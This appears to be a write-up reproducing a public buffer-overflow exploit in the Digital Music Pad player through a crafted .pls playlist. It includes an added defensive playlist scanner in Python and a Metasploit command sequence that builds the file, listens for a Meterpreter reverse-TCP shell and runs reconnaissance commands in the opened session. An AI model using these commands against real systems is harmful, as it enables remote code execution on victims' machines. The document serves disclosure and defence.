EDB-ID-15134 : Digital Music Pad SEH overflow
Timeline :
Vulnerability discovered and PoC disclosed on Exploit-DB by Abhishek Lyall on 2010-09-17
Metasploit PoC provided on 2010-10-03
PoC provided by :
Abhishek Lyall
Reference(s) :
Affected version(s) :
Digital Music Pad 8.2.3.3.4
Tested on Windows XP SP3 with :
Digital Music Pad 8.2.3.3.4
Description :
This module exploits a buffer overflow in Digital Music Pad version 8.2.3.3.4. When a malicious pls file is opened with Digital Music Pad, a remote attacker could overflow a buffer and execute arbitrary code.
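A defensive triage check for the file type named above, as an added example that is not part of the original post or of the Metasploit module: it parses the raw bytes of a .pls playlist and flags entries no legitimate playlist would contain. The 1024-byte limit, the function name and both samples are assumptions, since the page does not state the length that triggers the overflow.

```python
# Assumed triage limit: the page does not give the length that triggers the
# overflow, so this is a conservative bound for "no sane playlist entry".
MAX_VALUE_LEN = 1024


def scan_pls(data: bytes, max_len: int = MAX_VALUE_LEN) -> list:
    """Return (line_no, reason) findings for the raw bytes of a .pls file."""
    findings = []
    # Drop a UTF-8 byte order mark, then split on ASCII line endings only.
    body = [ln.strip() for ln in data.lstrip(b"\xef\xbb\xbf").splitlines()]
    first = next((ln for ln in body if ln), b"")
    if first.lower() != b"[playlist]":
        findings.append((1, "missing [playlist] header"))
    for no, line in enumerate(body, start=1):
        if not line or line.startswith(b"["):
            continue
        key, sep, value = line.partition(b"=")
        name = key.decode("ascii", "replace")
        if not sep:
            # No key=value structure: only report it when it is also oversized.
            if len(line) > max_len:
                findings.append((no, f"unstructured line of {len(line)} bytes"))
            continue
        if len(value) > max_len:
            findings.append((no, f"{name} value is {len(value)} bytes"))
        # Control bytes (tab excepted) have no place in a path, URL or title.
        if any(b < 0x20 and b != 0x09 for b in value):
            findings.append((no, f"{name} value contains control bytes"))
    return findings


# Constructed samples, not taken from the page or from any real exploit file.
BENIGN = (b"[playlist]\nNumberOfEntries=1\nFile1=http://radio.example/stream\n"
          b"Title1=Example\nLength1=-1\nVersion=2\n")
OVERSIZED = b"[playlist]\nNumberOfEntries=1\nFile1=" + b"A" * 5000 + b"\nVersion=2\n"

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(label, scan_pls(sample))
```

Run it over playlist attachments or downloads at a mail or web gateway and quarantine any file that returns findings.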
Commands :
use exploit/windows/fileformat/digital_music_pad_pls
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j
sessions -i 1
sysinfo
getuid
ipconfig
